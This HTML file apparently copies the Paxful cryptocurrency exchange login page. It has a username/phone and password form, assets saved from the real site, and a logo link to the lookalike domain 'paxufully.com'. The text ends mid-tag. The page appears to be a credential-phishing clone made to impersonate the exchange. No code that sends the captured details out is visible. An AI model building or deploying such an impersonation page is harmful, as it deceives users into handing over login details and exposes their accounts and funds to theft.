<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="stylesheet" href="path/to/bootstrap/css/bootstrap.min.css" />

    <link
      rel="stylesheet"
      href="https://use.fontawesome.com/releases/v5.8.1/css/all.css"
      integrity="sha384-50oBUHEmvpQ+1lW4y57PTFmhCaXp0ML5d60M1M7uH2+nqUivzIebhndOJK28anvf"
      crossorigin="anonymous"
    />

    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"
      rel="stylesheet"
    />

    <!--From Paxful site-->
    <link
      rel="icon"
      href="https://accounts.paxful.com/static/favicons/favicon.ico"
    />
    <link
      rel="apple-touch-icon"
      href="https://accounts.paxful.com/static/favicons/apple-touch-icon.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="57x57"
      href="https://accounts.paxful.com/static/favicons/apple-icon-57x57.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="60x60"
      href="https://accounts.paxful.com/static/favicons/apple-icon-60x60.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="72x72"
      href="https://accounts.paxful.com/static/favicons/apple-icon-72x72.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="76x76"
      href="https://accounts.paxful.com/static/favicons/apple-icon-76x76.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="114x114"
      href="https://accounts.paxful.com/static/favicons/apple-icon-114x114.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="120x120"
      href="https://accounts.paxful.com/static/favicons/apple-icon-120x120.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="144x144"
      href="https://accounts.paxful.com/static/favicons/apple-icon-144x144.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="152x152"
      href="https://accounts.paxful.com/static/favicons/apple-icon-152x152.png"
    />
    <link
      rel="apple-touch-icon"
      sizes="180x180"
      href="https://accounts.paxful.com/static/favicons/apple-icon-180x180.png"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="32x32"
      href="https://accounts.paxful.com/static/favicons/favicon-32x32.png"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="96x96"
      href="https://accounts.paxful.com/static/favicons/favicon-96x96.png"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="16x16"
      href="https://accounts.paxful.com/static/favicons/favicon-16x16.png"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="192x192"
      href="https://accounts.paxful.com/static/favicons/favicon-192x192.png"
    />
    <link
      rel="manifest"
      href="https://accounts.paxful.com/static/favicons/manifest.json"
    />
    <meta name="theme-color" content="#6b33a7" />
    <meta name="theme-color" content="#000000" />
    <meta
      name="description"
      content="Sign in to your Paxful account trade or manage your cryptocurrency. We suggest setting up two-factor authentication for enhanced account security."
    />
    <link
      href="./paxful image george_files/vendors.chunk.css"
      rel="stylesheet"
    />
    <link
      href="./paxful image george_files/main.593036ead6f2ace2ad4b.css"
      rel="stylesheet"
    />
    <link rel="stylesheet" href="./paxful image george_files/css" />
    <!--End-->
    <title>Log In to Your Account | Paxful</title>
    <!-- Google Tag Manager -->
    <script
      type="text/javascript"
      async=""
      src="./paxful image george_files/js"
    ></script>
    <script
      type="text/javascript"
      async=""
      src="./paxful image george_files/analytics.js.download"
    ></script>
    <script async="" src="./paxful image george_files/gtm.js.download"></script>
    <script>
      (function (w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({ "gtm.start": new Date().getTime(), event: "gtm.js" });
        var f = d.getElementsByTagName(s)[0],
          j = d.createElement(s),
          dl = l != "dataLayer" ? "&l=" + l : "";
        j.async = true;
        j.src = "https://www.googletagmanager.com/gtm.js?id=" + i + dl;
        f.parentNode.insertBefore(j, f);
      })(window, document, "script", "dataLayer", "GTM-57BRSLP");
    </script>
    <!-- End Google Tag Manager -->
    <style data-emotion=""></style>
    <style class="fslightbox-styles">
      .fslightbox-fade-in {
        animation: fslightbox-fade-in 0.3s cubic-bezier(0, 0, 0.7, 1);
      }
      .fslightbox-fade-out {
        animation: fslightbox-fade-out 0.3s ease;
      }
      .fslightbox-fade-in-strong {
        animation: fslightbox-fade-in-strong 0.3s cubic-bezier(0, 0, 0.7, 1);
      }
      .fslightbox-fade-out-strong {
        animation: fslightbox-fade-out-strong 0.3s ease;
      }
      @keyframes fslightbox-fade-in {
        from {
          opacity: 0.65;
        }
        to {
          opacity: 1;
        }
      }
      @keyframes fslightbox-fade-out {
        from {
          opacity: 0.35;
        }
        to {
          opacity: 0;
        }
      }
      @keyframes fslightbox-fade-in-strong {
        from {
          opacity: 0.3;
        }
        to {
          opacity: 1;
        }
      }
      @keyframes fslightbox-fade-out-strong {
        from {
          opacity: 1;
        }
        to {
          opacity: 0;
        }
      }
      .fslightbox-scale-in {
        animation: fslightbox-scale-in 0.5s ease;
      }
      @keyframes fslightbox-scale-in {
        from {
          opacity: 0;
          transform: scale(0.5);
        }
        to {
          opacity: 1;
          transform: scale(1);
        }
      }
      .fslightbox-absoluted {
        position: absolute;
        top: 0;
        left: 0;
      }
      .fslightbox-cursor-grabbing {
        cursor: grabbing;
      }
      .fslightbox-full-dimension {
        width: 100%;
        height: 100%;
      }
      .fslightbox-open {
        overflow: hidden;
        height: 100%;
      }
      .fslightbox-flex-centered {
        display: flex;
        justify-content: center;
        align-items: center;
      }
      .fslightbox-opacity-0 {
        opacity: 0 !important;
      }
      .fslightbox-opacity-1 {
        opacity: 1 !important;
      }
      .fslightbox-scrollbarfix {
        padding-right: 17px;
      }
      .fslightbox-transform-transition {
        transition: transform 0.3s;
      }
      .fslightbox-container {
        font-family: Helvetica, sans-serif;
        position: fixed;
        top: 0;
        left: 0;
        background: linear-gradient(rgba(30, 30, 30, 0.9), #000 1810%);
        z-index: 9999999;
        touch-action: none;
        -webkit-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
        user-select: none;
        -webkit-tap-highlight-color: transparent;
      }
      .fslightbox-container * {
        box-sizing: border-box;
      }
      .fslightbox-svg-path {
        transition: fill 0.15s ease;
        fill: #d1d2d2;
      }
      .fslightbox-loader {
        display: block;
        margin: auto;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        width: 67px;
        height: 67px;
      }
      .fslightbox-loader div {
        box-sizing: border-box;
        display: block;
        position: absolute;
        width: 54px;
        height: 54px;
        margin: 6px;
        border: 5px solid;
        border-color: #999 transparent transparent transparent;
        border-radius: 50%;
        animation: fslightbox-loader 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
      }
      .fslightbox-loader div:nth-child(1) {
        animation-delay: -0.45s;
      }
      .fslightbox-loader div:nth-child(2) {
        animation-delay: -0.3s;
      }
      .fslightbox-loader div:nth-child(3) {
        animation-delay: -0.15s;
      }
      @keyframes fslightbox-loader {
        0% {
          transform: rotate(0);
        }
        100% {
          transform: rotate(360deg);
        }
      }
      .fslightbox-thumbs-loader {
        width: 54px !important;
        height: 54px !important;
      }
      .fslightbox-thumbs-loader div {
        border-width: 4px !important;
        width: 44px !important;
        height: 44px !important;
      }
      .fslightbox-sources-outers-wrapper {
        z-index: 2;
        top: 0;
        transition: transform 0.3s;
      }
      .fslightbox-nav {
        height: 45px;
        width: 100%;
        transition: opacity 0.3s;
      }
      .fslightbox-slide-number-container {
        display: flex;
        justify-content: center;
        align-items: center;
        position: relative;
        height: 100%;
        font-size: 15px;
        color: #d7d7d7;
        z-index: 0;
        max-width: 55px;
        text-align: left;
      }
      .fslightbox-slide-number-container .fslightbox-flex-centered {
        height: 100%;
      }
      .fslightbox-slash {
        display: block;
        margin: 0 5px;
        width: 1px;
        height: 12px;
        transform: rotate(15deg);
        background: #fff;
      }
      .fslightbox-toolbar {
        position: absolute;
        z-index: 3;
        right: 0;
        top: 0;
        height: 100%;
        display: flex;
        background: rgba(35, 35, 35, 0.65);
      }
      .fslightbox-toolbar-button {
        height: 100%;
        width: 45px;
        cursor: pointer;
      }
      .fslightbox-toolbar-button:hover .fslightbox-svg-path {
        fill: #fff;
      }
      .fslightbox-slide-btn-container {
        display: flex;
        align-items: center;
        padding: 12px 12px 12px 6px;
        position: absolute;
        top: 50%;
        cursor: pointer;
        z-index: 3;
        transform: translateY(-50%);
        transition: opacity 0.3s;
      }
      @media (min-width: 476px) {
        .fslightbox-slide-btn-container {
          padding: 22px 22px 22px 6px;
        }
      }
      @media (min-width: 768px) {
        .fslightbox-slide-btn-container {
          padding: 30px 30px 30px 6px;
        }
      }
      .fslightbox-slide-btn-container:hover .fslightbox-svg-path {
        fill: #f1f1f1;
      }
      .fslightbox-slide-btn {
        padding: 9px;
        font-size: 26px;
        background: rgba(35, 35, 35, 0.65);
      }
      @media (min-width: 768px) {
        .fslightbox-slide-btn {
          padding: 10px;
        }
      }
      @media (min-width: 1600px) {
        .fslightbox-slide-btn {
          padding: 11px;
        }
      }
      .fslightbox-slide-btn-container-previous {
        left: 0;
      }
      @media (max-width: 475.99px) {
        .fslightbox-slide-btn-container-previous {
          padding-left: 3px !important;
        }
      }
      .fslightbox-slide-btn-container-next {
        right: 0;
        padding-left: 12px !important;
        padding-right: 3px !important;
      }
      @media (min-width: 476px) {
        .fslightbox-slide-btn-container-next {
          padding-left: 22px !important;
        }
      }
      @media (min-width: 768px) {
        .fslightbox-slide-btn-container-next {
          padding-left: 30px !important;
        }
      }
      @media (min-width: 476px) {
        .fslightbox-slide-btn-container-next {
          padding-right: 6px !important;
        }
      }
      .fslightbox-down-event-detector {
        position: absolute;
        z-index: 1;
      }
      .fslightbox-slide-pointering-hoverer {
        z-index: 4;
      }
      .fslightbox-slideshow-bar {
        width: 0;
        height: 2px;
        z-index: 4;
        opacity: 0;
        background: #fff;
        transition: opacity 0.4s;
      }
      .fslightbox-invalid-file-wrapper {
        font-size: 26px;
        color: #eaebeb;
        margin: auto;
      }
      .fslightbox-video {
        object-fit: cover;
      }
      .fslightbox-youtube-iframe {
        border: 0;
      }
      .fslightbox-source {
        position: relative;
        margin: auto;
        z-index: 2;
        opacity: 0;
        cursor: zoom-in;
        transform: translateZ(0);
        transition: transform 0.3s;
        backface-visibility: hidden;
      }
      .fslightbox-source-outer {
        will-change: transform;
      }
      .fslightbox-source-inner {
        transition: transform 0.3s;
      }
      .fslightbox-source-inner-pinching {
        transition: transform 0.1s linear;
      }
      .fslightbox-thumbs {
        position: absolute;
        bottom: 0;
        left: 0;
        width: 100%;
        z-index: -1;
        background: linear-gradient(180deg, rgba(0, 0, 0, 0), #1e1e1e 100%);
        opacity: 0;
        transition: opacity 0.2s;
        backface-visibility: hidden;
        padding: 0 5px 12px 5px;
        height: 114px;
      }
      @media (min-width: 992px) {
        .fslightbox-thumbs {
          padding-bottom: 13px;
          height: 120px;
        }
      }
      @media (min-width: 1600px) {
        .fslightbox-thumbs {
          padding-bottom: 14px;
          height: 126px;
        }
      }
      .fslightbox-thumbs-active {
        opacity: 1;
        z-index: 3;
      }
      .fslightbox-thumbs-inner {
        height: 100%;
        display: inline-flex;
        justify-content: flex-start;
        align-items: center;
        will-change: transform;
      }
      .fslightbox-thumb-wrapper {
        position: relative;
        height: 100%;
        margin: 0 4px;
        opacity: 0;
        transition: opacity 0.3s;
      }
      .fslightbox-thumb-wrapper svg {
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        cursor: pointer;
        z-index: 1;
      }
      .fslightbox-thumb-wrapper path {
        fill: #fff;
      }
      .fslightbox-thumb-wrapper-darkener {
        position: absolute;
        top: 2px;
        left: 2px;
        width: calc(100% - 4px);
        height: calc(100% - 4px);
        background: rgba(0, 0, 0, 0.4);
        cursor: pointer;
      }
      .fslightbox-thumb {
        cursor: pointer;
        border-radius: 1px;
        height: 100%;
        width: auto !important;
        border: 2px solid transparent;
      }
      .fslightbox-thumb-active {
        border: 2px solid #fff !important;
      }
      .fslightbox-thumb-invalid {
        background: linear-gradient(to bottom, #0f0f0f, rgba(15, 15, 15, 0.5));
        display: inline-block;
        min-width: 155px;
      }
      .fslightbox-thumbs-cursorer {
        z-index: 4;
        cursor: grabbing;
      }
      .fslightbox-caption {
        position: absolute;
        bottom: 0;
        left: 50%;
        width: 100%;
        background: linear-gradient(180deg, rgba(0, 0, 0, 0), #1e1e1e 100%);
        transform: translateX(-50%);
        opacity: 0;
        transition: opacity 0.2s;
        z-index: -1;
      }
      .fslightbox-caption-inner {
        padding: 25px;
        max-width: 1200px;
        color: #eee;
        text-align: center;
        font-size: 14px;
      }
      @media (min-width: 768px) {
        .fslightbox-caption-inner {
          padding: 30px 25px;
        }
      }
      .fslightbox-caption-active {
        opacity: 1;
        z-index: 3;
      }
    </style>
    <script
      type="text/javascript"
      async=""
      src="./paxful image george_files/embed2.5459dcd.js.download"
    ></script>
    <script
      charset="UTF-8"
      async=""
      src="./paxful image george_files/gettype.php"
    ></script>
    <script
      charset="UTF-8"
      async=""
      crossorigin="anonymous"
      src="./paxful image george_files/fullpage.9.1.0.js.download"
    ></script>
    <script charset="UTF-8" src="./paxful image george_files/get.php"></script>
    <link
      href="./paxful image george_files/style_https.1.5.8.css"
      rel="stylesheet"
    />
  </head>
  <body
    class="ltr"
    data-new-gr-c-s-check-loaded="14.1086.0"
    data-gr-ext-installed=""
  >
    <!-- Google Tag Manager (noscript) -->
    <noscript
      ><iframe
        src="https://www.googletagmanager.com/ns.html?id=GTM-57BRSLP"
        height="0"
        width="0"
        style="display: none; visibility: hidden"
      ></iframe
    ></noscript>
    <!-- End Google Tag Manager (noscript) -->
    <script>
      window.paxful = {
        availableLanguages: {
          so: "af Soomaali",
          af: "Afrikaans",
          ig: "\u00c1s\u1ee5\u0300s\u1ee5\u0300 \u00ccgb\u00f2",
          ar: "\u0627\u0644\u0639\u0631\u0628\u064a\u0629",
          id: "Bahasa Indonesia",
          ms: "Bahasa Melayu",
          cs: "\u010ce\u0161tina",
          da: "Dansk",
          de: "Deutsch",
          yo: "\u00c8d\u00e8 Yor\u00f9b\u00e1",
          et: "Eesti",
          en: "English",
          es: "Espa\u00f1ol",
          fr: "Fran\u00e7ais",
          ha: "Hausa",
          xh: "isiXhosa",
          zu: "isiZulu",
          it: "Italiano",
          sw: "Kiswahili",
          lv: "Latvie\u0161u",
          lt: "Lietuvi\u0173",
          lg: "Luganda",
          hu: "Magyar",
          "nl-nl": "Nederlands",
          pcm: "Naija",
          nb: "Norsk Bokm\u00e5l",
          pl: "Polski",
          pt: "Portugu\u00eas",
          "pt-br": "Portugu\u00eas brasileiro",
          ro: "Rom\u00e2n\u0103",
          sl: "Sloven\u0161\u010dina",
          sr: "Srpski",
          fi: "Suomi",
          "sv-se": "Svenska",
          tl: "Wikang Tagalog",
          vi: "Ti\u1ebfng Vi\u1ec7t",
          tr: "T\u00fcrk\u00e7e",
          el: "\u0395\u03bb\u03bb\u03b7\u03bd\u03b9\u03ba\u03ac",
          bg: "\u0411\u044a\u043b\u0433\u0430\u0440\u0441\u043a\u0438",
          ru: "\u0420\u0443\u0441\u0441\u043a\u0438\u0439",
          uk: "\u0423\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0430",
          he: "\u05e2\u05d1\u05e8\u05d9\u05ea",
          ur: "\u0627\u064f\u0631\u062f\u064f\u0648",
          hi: "\u0939\u093f\u0928\u094d\u0926\u0940",
          km: "\u1797\u17b6\u179f\u17b6\u1781\u17d2\u1798\u17c2\u179a",
          ko: "\ud55c\uad6d\uc5b4",
          ja: "\u65e5\u672c\u8a9e",
          "zh-cn": "\u7b80\u4f53\u4e2d\u6587(SC)",
          "zh-tw": "\u7e41\u9ad4\u4e2d\u6587(TC)",
        },
      };
    </script>
    <!--Paxful code-->
    <div id="root">
      <div class="MainTemplate__page">
        <div class="row align-items-stretch MainTemplate__row">
          <div
            class="col-12 col-xl-5 col-lg-6 px-xl-7 py-3 py-5 py-md-7 d-flex justify-content-center justify-content-lg-end"
          >
            <div
              class="w-100 d-flex flex-column align-items-start px-3 px-md-4 px-xl-0 MainTemplate__content"
            >
              <div
                class="d-flex align-items-center justify-content-between w-100 mb-5 dark-theme-icon-disable"
              >
                <a href="https://paxufully.com/">
                  <svg
                    viewBox="0 0 123.7 23.3"
                    xmlns="http://www.w3.org/2000/svg"
                    fill="#333"
                    width="120"
                  >
                    <path
                      d="M91.3 1.7V12c0 3.6 1.5 5 4.1 5s4.1-1.5 4.1-5V1.7h4.3v10.4c0 5.5-3.1 8.5-8.4 8.5-5.2 0-8.4-3-8.4-8.5V1.7zm-59.8 0l8.3 18.6h-4.5l-1.7-4H25l-1.7 4h-4.4l8.3-18.6zm49.7 0v3.5h-9.7v4.9H80v3.5h-8.5v6.8h-4.3V1.7zm32.8 0v15.1h9.7v3.5h-14V1.7zM8.1 1.7c4.9 0 8.1 2.5 8.1 6.8 0 4.1-3.1 6.7-8.1 6.7H4.3v5.2H0V1.7zm47 9.9l6.3 8.7h-4.1c-.6 0-1.2-.2-1.6-.7l-.1-.1-2.3-3.2c-.5-.8-.5-1.8 0-2.6l.1-.2zM29.3 6l-2.9 7.1h5.9zM7.9 5.2H4.3v6.5h3.5c2.7 0 4-1.2 4-3.2s-1.3-3.3-3.9-3.3zm39-3.5c.7 0 1.2.2 1.6.7l.1.1 1.2 1.7c.5.7.5 1.7.1 2.4l-.1.1-1.7 2.4-5.4-7.5z"
                    ></path>
                    <path
                      d="M63.1 0L41.5 23.2c-.2.3-.7-.1-.4-.4L56.7.8c.4-.5 1-.8 1.7-.8z"
                      fill="#00a5ef"
                    ></path>
                  </svg>
                </a>
                <div class="d-flex">
                  <div class="d-block dropdown">
                    <button
                      type="button"
                      aria-haspopup="true"
                      aria-expanded="false"
                      class="d-flex align-items-center w-100 px-2 justify-content-between btn btn-light"
                    >
                      <svg
                        width="16"
                        height="16"
                        viewBox="0 0 16 16"
                        fill="currentColor"
                        class="mr-2 text-gray-500"
                      >
                        <path
                          d="M8 0C3.6 0 0 3.6 0 8s3.6 8 8 8 8-3.6 8-8-3.6-8-8-8zM1.8 8c0-.8.2-1.6.4-2.3.5.3 1.2.6 1.9.7C4 7 4 7.5 4 8s0 1 .1 1.6c-.7.1-1.4.4-1.9.7-.2-.7-.4-1.5-.4-2.3zm4 0c0-.4 0-.8.1-1.2.7.1 1.4.1 2.1.1s1.4 0 2.1-.1c0 .4.1.8.1 1.2s0 .8-.1 1.2c-.7-.1-1.4-.1-2.1-.1s-1.4 0-2.1.1c-.1-.4-.1-.8-.1-1.2zm6.1-1.6c.7-.2 1.3-.4 1.8-.7.3.7.5 1.5.5 2.3s-.2 1.6-.4 2.3c-.5-.3-1.1-.6-1.8-.7V8c0-.5 0-1-.1-1.6zm1-2.2c-.2.2-.6.3-1.2.5-.2-.8-.4-1.5-.7-2.1.7.3 1.3.9 1.9 1.6zM8 1.8c.1 0 .6.1 1.2 1.3.3.6.5 1.2.7 1.9-.6.1-1.2.1-1.9.1s-1.3 0-1.9-.1c.2-.7.4-1.3.6-1.8.7-1.3 1.2-1.4 1.3-1.4zm-2.9.7c-.3.7-.5 1.4-.7 2.2-.6-.2-1-.3-1.3-.5.6-.7 1.2-1.3 2-1.7zm-2 9.3c.2-.2.6-.3 1.2-.5.2.8.4 1.5.7 2.1-.7-.3-1.3-.9-1.9-1.6zM8 14.2c-.1 0-.6-.1-1.2-1.3-.3-.5-.5-1.1-.6-1.8.6-.1 1.2-.1 1.9-.1s1.3 0 1.9.1c-.2.7-.4 1.3-.6 1.8-.8 1.2-1.3 1.3-1.4 1.3zm2.9-.7c.3-.6.5-1.4.7-2.1.6.2 1 .3 1.2.5-.5.6-1.1 1.2-1.9 1.6z"
                        ></path></svg
                      >English<svg
                        width="16"
                        height="16"
                        viewBox="0 0 16 16"
                        fill="currentColor"
                        class="ml-2 LanguageSelector__icon text-gray-500"
                      >
                        <path
                          fill-rule="evenodd"
                          d="M2.707 4.293L8 9.585l5.293-5.292a1 1 0 111.414 1.414l-6 6a.996.996 0 01-.53.277l-.118.014h-.118a.997.997 0 01-.648-.29l-6-6a1 1 0 011.414-1.415z"
                          clip-rule="evenodd"
                        ></path>
                      </svg>
                    </button>
                    <div
                      tabindex="-1"
                      role="menu"
                      aria-hidden="true"
                      class="rounded DropdownMenu-module_menu__2I4mi overflow-auto LanguageSelector__dropdown dropdown-menu"
                    >
                      <div class="">
                        <div class="LanguageSelector__columns">
                          <button
                            type="button"
                            class="dropdown-item d-inline-flex btn btn-link btn-lg"
                          >
                            <span class="ml-4">af Soomaali</span>
                          </button>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>

              <div class="w-100 d-flex flex-grow-1">
                <div class="w-100 h-100">
                  <h1 class="h2 qa-login-page-title mb-3 mb-lg-4">
                    Log In With Paxful
                  </h1>
                  <div
                    class="alert alert-info d-flex align-items-start font-weight-semibold regular-18 lh-16 mb-3 mb-xs-4"
                  >
                    <svg
                      width="16"
                      height="16"
                      viewBox="0 0 16 16"
                      fill="currentColor"
                      class="mr-2_5 icon"
                    >
                      <path
                        fill-rule="evenodd"
                        d="M8 2a6 6 0 100 12A6 6 0 008 2zM0 8a8 8 0 1116 0A8 8 0 010 8zm9-3a1 1 0 11-2 0 1 1 0 012 0zM8 7a1 1 0 00-1 1v3a1 1 0 102 0V8a1 1 0 00-1-1z"
                        clip-rule="evenodd"
                      ></path>
                    </svg>
                    <div class="d-flex flex-column flex-xs-row">
                      IMPORTANT! Please check that you are visiting
                      https://accounts.paxful.com/<img
                        src="./paxful image george_files/https-label-91194ad43fc85d71e34a467282e95f23.webp"
                        class="mt-2 ml-xs-3 align-self-start LoginTemplate__labelIcon"
                        alt="url"
                      />
                    </div>
                  </div>

                  <div class="'mb-3"></div>

                  <form>
                    <div class="mb-3">
                      <label
                        for="username"
                        class="label-small font-weight-semibold"
                        >Your Phone or Email</label
                      >
                      <div>
                        <div>
                          <div
                            class="d-flex align-items-center justify-content-between form-control"
                          >
                            <input
                              name="username"
                              type="text"
                              class="min-width-0 border-transparent py-0 form-control"
                              value=""
                            />
                          </div>
                        </div>
                        <div class="position-relative cursor-pointer"></div>
                      </div>
                    </div>
                    <div class="mb-4">
                      <div
                        class="d-flex align-items-start justify-content-between"
                      >
                        <label
                          for="password"
                          class="label-small font-weight-semibold"
                          >Your Password</label
                        >
                        <a class="regular-20 lh-16" tabindex="-1" href="#/"
                          >Forgot password?
                        </a>
                      </div>
                      <div>
                        <div
                          class="d-flex align-items-center justify-content-between form-control mb-2"
                        >
                          <input
                            name="password"
                            id="password"
                            autocomplete="current-password"
                            data-recording-disable="true"
                            type="password"
                            class="min-width-0 border-transparent py-0 form-control"
                            value=""
                          />
                          <!-- <button
                            type="button"
                            class="text-gray-600 btn-square btn btn-transparent btn-md"
                          >
                            <svg
                              width="16"
                              height="16"
                              viewBox="0 0 16 16"
                              fill="currentColor"
                              class="d-block"
                            >
                              <path
                                fill-rule="evenodd"
                                d="M2.03 8.006L2.027 8l.003-.006a2.35 2.35 0 01.287-.41c.288-.344.73-.753 1.3-1.145C4.762 5.65 6.318 5 8 5c1.68 0 3.235.656 4.381 1.448a6.704 6.704 0 011.303 1.148c.142.17.234.307.285.404a2.465 2.465 0 01-.285.404 6.704 6.704 0 01-1.303 1.148C11.235 10.344 9.68 11 8 11c-1.682 0-3.238-.65-4.383-1.439-.57-.392-1.012-.8-1.3-1.144a2.397 2.397 0 01-.287-.41zM8 3c-2.184 0-4.128.836-5.517 1.79-.696.48-1.279 1.007-1.7 1.51a4.29 4.29 0 00-.528.772C.128 7.317 0 7.642 0 8c0 .358.128.683.255.928.135.26.318.522.528.772.421.503 1.004 1.03 1.7 1.51C3.872 12.163 5.816 13 8 13c2.186 0 4.131-.844 5.518-1.802.696-.48 1.278-1.008 1.698-1.508.21-.25.392-.508.527-.766.126-.24.257-.565.257-.924 0-.359-.13-.684-.257-.924a4.385 4.385 0 00-.527-.766c-.42-.5-1.002-1.027-1.698-1.508C12.131 3.844 10.186 3 8 3zm0 7a2 2 0 100-4 2 2 0 000 4z"
                                clip-rule="evenodd"
                              ></path>
                            </svg>
                          </button> -->
                        </div>
                      </div>
                    </div>
                    <button
                      type="submit"
                      class="py-3 d-flex justify-content-between btn btn-primary btn-lg btn-block"
                    >
                      <span>Log in</span
                      ><svg
                        width="16"
                        height="16"
                        viewBox="0 0 16 16"
                        fill="currentColor"
                        class="reflect-element"
                      >
                        <path
                          fill-rule="evenodd"
                          d="M4.294 13.292l5.292-5.293-5.292-5.293a1 1 0 111.414-1.414l6 6a.99.99 0 01.277.53L12 7.94v.118a.996.996 0 01-.291.648l-6 6a1 1 0 11-1.414-1.414z"
                          clip-rule="evenodd"
                        ></path>
                      </svg>
                    </button>
                  </form>
                  <hr class="mt-4" />
                  <span class="d-flex regular-24"
                    >New on Paxful?<a
                      href="https://paxful.com/register?locale=en"
                      class="ml-2"
                      >Create an Account</a
                    ></span
                  >
                </div>
              </div>
            </div>
          </div>

          <div
            class="d-none d-lg-block col-12 col-xl-7 col-lg-6 pl-0 overflow-hidden bg-blue-100"
          >
            <div
              class="d-flex align-items-center justify-content-center h-100 overflow-hidden"
            >
              <img
                src="./photo/icon.png"
                loading="lazy"
                alt="Create an Account"
                sizes="(max-width: 1200px) 400px, (max-width: 1400px) 300px, 600px"
                style="opacity: 1; height: 500px"
              />
            </div>
          </div>
        </div>
      </div>
    </div>

    <script src="./paxful image george_files/gt.js.download" defer=""></script>

    <script
      src="./paxful image george_files/djangojs.js.download"
      defer=""
    ></script>
    <script
      src="./paxful image george_files/vendors.chunk.js.download"
      defer=""
    ></script>
    <script
      src="./paxful image george_files/main.03bb6895072af2455dfa.bundle.js.download"
      defer=""
    ></script>

    <!-- Accessibility - paxful.com -->

    <script
      async=""
      id="__ada"
      data-handle="paxful"
      src="./paxful image george_files/embed2.js.download"
    ></script>
    <script>
      (function () {
        var js =
          "window['__CF$cv$params']={r:'769eca3bfa779cef',m:'og5h1cQQEKeWZWR_20LDYip8l1QQKpgmsG18bypHMr4-1668418872-0-AYwdzc0QuvsMCs7rz6+HIiSbMdHf9312TNFYR16DUriuOgYYbr8GHuN7rWk5uqRpvJBivhYrvASgSL1KNGCQPsyadxdROCLJ6Z6RXcXmzQY2yYJlqY/HXl8KZLE+H43MMuxH6JAmQ6DMu0rmpRWTrQp937lKQmq9klERpbYV1+OXQ43c82lwYWWGuodsC1KyFnflLIPcLMpqofytdflCKnNaS0bfA99HU4vP4wybccsHhu1zpYV7i520pfxXiziUf7Wzv3WViDU4ami9VhDsjWG/wkui1MyXXXnFOgmOHYSq8Tbu+DVGur5bnheVqNHZK21m7YcmrjGiXXoViM4tEwm/6eglfaM3UANJKLIIiKoqC01CE7QofBQhunC7X6kbhplOWqrx9kn5NY2yYy25NI/7v+SaNbwIcCKaVYz5YqF6sTsIYC0BMiixprAZgiRtHWHUR4+bzFbgmnLaWKnmTio=',s:[0x749c30628d,0x2c5cb97d0f],u:'/cdn-cgi/challenge-platform/h/b'};var now=Date.now()/1000,offset=14400,ts=''+(Math.floor(now)-Math.floor(now%offset)),_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/h/b/scripts/alpha/invisible.js?ts='+ts,document.getElementsByTagName('head')[0].appendChild(_cpo);";
        var _0xh = document.createElement("iframe");
        _0xh.height = 1;
        _0xh.width = 1;
        _0xh.style.position = "absolute";
        _0xh.style.top = 0;
        _0xh.style.left = 0;
        _0xh.style.border = "none";
        _0xh.style.visibility = "hidden";
        document.body.appendChild(_0xh);
        function handler() {
          var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;
          if (_0xi) {
            var _0xj = _0xi.createElement("script");
            _0xj.nonce = "";
            _0xj.innerHTML = js;
            _0xi.getElementsByTagName("head")[0].appendChild(_0xj);
          }
        }
        if (document.readyState !== "loading") {
          handler();
        } else if (window.addEventListener) {
          document.addEventListener("DOMContentLoaded", handler);
        } else {
          var prev = document.onreadystatechange || function () {};
          document.onreadystatechange = function (e) {
            prev(e);
            if (document.readyState !== "loading") {
              document.onreadystatechange = prev;
              handler();
            }
          };
        }
      })();
    </script>
    <iframe
      height="1"
      width="1"
      style="
        position: absolute;
        top: 0px;
        left: 0px;
        border: none;
        visibility: hidden;
      "
      src="./paxful image george_files/saved_resource.html"
    ></iframe>
    <script
      defer=""
      src="./paxful image george_files/vaafb692b2aea4879b33c060e79fe94621666317369993"
      integrity="sha512-0ahDYl866UMhKuYcW078ScMalXqtFJggm7TmlUtp0UlD4eQk0Ixfnm5ykXKvGJNFjLMoortdseTfsRT8oCfgGA=="
      data-cf-beacon='{"rayId":"769eca3bfa779cef","token":"c9e664bebc9b40f69065d056cfd1eef3","version":"2022.11.0","si":100}'
      crossorigin="anonymous"
    ></script>

    <iframe
      width="0"
      height="0"
      style="display: none; position: absolute; left: -9999px"
      src="./paxful image george_files/saved_resource(1).html"
    ></iframe>
    <div id="ada-entry">
      <div
        style="
          position: fixed;
          width: 635px;
          height: 785px;
          right: 0px;
          background: linear-gradient(
            315.92deg,
            rgba(0, 0, 0, 0.08) 0%,
            rgba(0, 0, 0, 0) 40.92%
          );
          bottom: 0px;
          pointer-events: none;
          z-index: 9999;
          transition: all 500ms linear 0s;
          opacity: 0;
        "
      ></div>
      <iframe
        src="./paxful image george_files/index.html"
        scrolling="no"
        frameborder="0"
        id="ada-x-storage-frame"
        name="ada-x-storage-frame"
        title="ada-x-storage-frame"
        class="ada-x-storage-frame"
        role="application"
        style="
          position: absolute;
          top: -9999px;
          left: -9999px;
          visibility: hidden;
          height: 0px;
          width: 0px;
        "
      ></iframe
      ><iframe
        src="./paxful image george_files/index(1).html"
        scrolling="no"
        frameborder="0"
        id="ada-button-frame"
        name="ada-button-frame"
        title="Chat with bot"
